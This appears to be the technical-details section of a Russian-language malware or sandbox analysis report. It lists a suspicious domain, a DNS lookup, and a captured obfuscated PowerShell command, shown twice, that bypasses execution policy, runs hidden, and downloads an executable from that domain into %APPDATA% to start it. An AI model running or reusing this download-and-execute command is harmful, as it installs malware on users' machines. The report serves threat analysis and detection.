Техническая информация
- http://real346real.top/search.php как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "pOWeRshELL.exE -exEcUtIonPoLiCy BYPass -nopRofile -wiNdOwsTYLe hiddEN (neW-OBjEcT systEM.NeT.WebClIEnt).dOWNLoaDfILE('http://real346real.top/search.php','%APPDAtA%.EXE');sTARt-...
- DNS ASK re###46real.top
- '<SYSTEM32>\cmd.exe' /C "pOWeRshELL.exE -exEcUtIonPoLiCy BYPass -nopRofile -wiNdOwsTYLe hiddEN (neW-OBjEcT systEM.NeT.WebClIEnt).dOWNLoaDfILE('http://real346real.top/search.php','%APPDAtA%.EXE');sTARt-...' (со скрытым окном)